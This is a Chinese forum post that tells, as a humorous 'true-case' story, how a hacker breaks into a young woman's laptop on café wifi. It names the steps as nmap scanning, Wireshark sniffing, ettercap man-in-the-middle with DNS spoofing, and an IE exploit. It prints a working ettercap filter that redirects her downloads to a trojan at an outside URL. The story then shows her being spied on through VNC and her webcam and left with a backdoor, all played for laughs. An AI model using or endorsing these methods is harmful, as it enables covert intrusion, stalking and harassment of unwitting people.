姿势学习:屌丝黑客"追"妹记

2015-09-03 14:34:34 83 14314 4




第一章:咖啡馆的意外偶遇

注:此小说由真实案例改编(请原谅我以这种方式写技术文章) ,尽可能的还原了场景,有不足的地方或者技术不到位的地方请不要喷,尽可能的尊重下分享精神

众所周知黑客都是技术宅,在电脑强烈的辐射下,技术宅迟早有一日成为了大家心目中的“屌丝”,当然黑客没有女朋友那是理所当然的。

可是没女朋友就真的愿意当一个屌丝吗?当然不是,当屌丝我们也要当一个“幸福”的屌丝

黑客是神秘的,可以出现在地球的任意一个角落,当然火星也是可以去的,在黑客眼中,对他来说没有什么是隐私,因为根本没有这个词,

“没女朋友,可笑!”

“你不知道吗?只要是女的都是我的女朋友”

Only站起来严肃的看着我们说

Only是我的大学同学,也是一个非常出色的黑客,(黑客?他就是一个屌丝)
大家有时候坐在一起都会嘲笑他还没有找到女朋友,同学们都一个个的结婚了,甚至有的孩子都上小学了。

Only比较内向,平时都不怎么说话,大家一直开他玩笑,他也都习惯了,有时候就笑笑略过了,根本不会去计较什么!

大家看到Only这么严肃都被吓到了,整个咖啡厅都安静了,不一会隔壁桌的一个女孩发出了笑声,应该是在嘲笑他刚才说的那句话,Only有点脸红了,淡定的坐了下来

“你看!你吹牛把妹纸都逗笑了”
“刚那妹纸长得挺清秀的,你让她做你女朋友呗”
.......
.......
各种嘲讽的话语让Only终于忍不住了,Only打开了桌上的笔记本
看了下自己的IP地址:


然后再用nmap探测了下wifi内存活的主机

分析了下
192.168.169.1
192.168.169.254
应该是路由器
192.198.168.130是自己的主机
那剩下的应该是咖啡馆里其他用户的主机

“你在干什么”大家都很好奇
“不是你们说让那个女孩做我的女朋友吗?看着吧”
Only露出了邪恶的笑容
我转头看了下隔壁桌的妹子,妹子一个人在写什么东西(应该是这样的)
only估计是想搞下那个妹子的电脑,only扫描了咖啡厅所有的电脑只有这几个在线,所以其中一台肯定是妹子的主机
现在只要确定那一台是妹子的主机就可以了

最简单的方法就是去问?(显然不可能,妹子又不傻)

现在如果妹子在各种浏览什么网页,也许可以通过嗅探数据得到到底那一台是妹子的电脑,

0nly打开了wireshark进行了抓包嗅探,因为好多个主机有大量的数据包,所以分析数据是很费时费力的,Only一直在盯着妹子,好像在等待什么,突然他又露出了那诡异的笑容
“就是这个”

我们都凑过去看

“你怎么知道的”
“刚她登录邮箱发邮件了”
Only你可真是屌丝啊,I服了you!

确定了妹子的IP地址是 192.168.169.131

从嗅探中Only得知了妹子经常会用QQ邮箱发邮件和上微博,知道了妹子的QQ号和微博号

这还不够让Only满足,他打开nmap探测了下妹子的操作系统

居然用的XP,那可以用ettercap进行欺骗然后挂马了
这样就可以获得妹子的主机权限了

Only用metasploit(神器)生成了一个木马






Only打开了ettercap准备进行中间人攻击
首先新建一个规则
# replace rmccurdy with your website

# replace the url with what ever exe you like



if (ip.proto == TCP && tcp.dst == 80) {

if (search(DATA.data, "Accept-Encoding")) {

replace("Accept-Encoding", "Accept-Rubbish!");

# note: replacement string is same length as original string

msg("zapped Accept-Encoding!\n");

}

}

if (ip.proto == TCP && tcp.src == 80) {

replace("keep-alive", "close" ");

replace("Keep-Alive", "close" ");



}



if (ip.proto == TCP && search(DATA.data, ": application") ){

# enable for logging log(DECODED.data, "/tmp/log.log");

msg("found EXE\n");

# "Win32" is the first part of the exe example:

# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..

if (search(DATA.data, "Win32")) {

msg("doing nothing\n");

} else {

replace("200 OK", "301 Moved Permanently

Location: [url=http://www.xxx.com/exe.exe]http://www.xxx.com/exe.exe[/url]

");

msg("redirect success\n");



}

}
然后改掉里面的下载地址

最后编译下

然后进行欺骗

当妹纸不管下载什么东西的时候都会替换成我们的木马进行下载她运行后我们就可以获取权限了(当然木马首先得是免杀)

类似这样




所以当妹子下载什么的时候运行了我们的程序,就会中招

同时Only还用了另一种方法来进行攻击(怕妹子不上当)
因为前面得知妹子用的是XP所以Only生成了对IE浏览器攻击的网马




根据目标情况选择攻击模块

然后就用ettercap进行DNS欺骗



然后编辑我们的本地网页写上我们的网马代码


妹子访问任意www网页的这时候打开类似这样



不一会,妹子就中了Only设下的陷阱




都获取权限了那什么都能干了,我们看下妹子在干什么
开启VNC




Only就这样盯着看了半个小时,看妹子在干什么

缓过神后,0nly留了持久后门开了3389加上了远控木马(Only更喜欢这个)





然后产生了一个邪恶的想法(他想看妹子长什么样,因为妹子一直背坐着我们)

打开妹子的摄像头虽然获取了一张妹子的照片,但这远远不能满足Only

他要的是一个摄像头


Only满意的露出了笑容,但马上又板起脸来,好像想起了什么不开心的事
继续敲着键盘
开始编辑本地网页(我知道他要干什么了)


开启了DNS欺骗



妹子访问任意www网站的时候


同时Only又做了一个恶作剧

妹子的桌面上就出现了这样一个弹窗



妹子看到网页上有自己的照片再加上这样的弹窗,应该是被吓到了,四处张望了一下,立马关上电脑离开了咖啡厅
“妹子都被你吓跑了”
“啊”
Only这会沉浸在自己的“作品”中,有点得意,他听到自己把妹子吓跑了,又有一点失落,不过Only在妹子电脑上留了后门

“我们也走吧”
Only说,然后急匆匆的收拾了东西也跑了出去,

我们大家好像发现了点什么,就一起笑着也跟了出去

后面Only还会用什么方法继续追妹子呢?黑客的方法又怎么不同寻常呢?请继续关注<屌丝黑客“追”妹记>

TCV 5

类别 渗透测试

关于作者

Anonymous0篇文章0篇回复

We are Anonymous!

Anonymous
83

评论83次

要评论?请先  登录  或  注册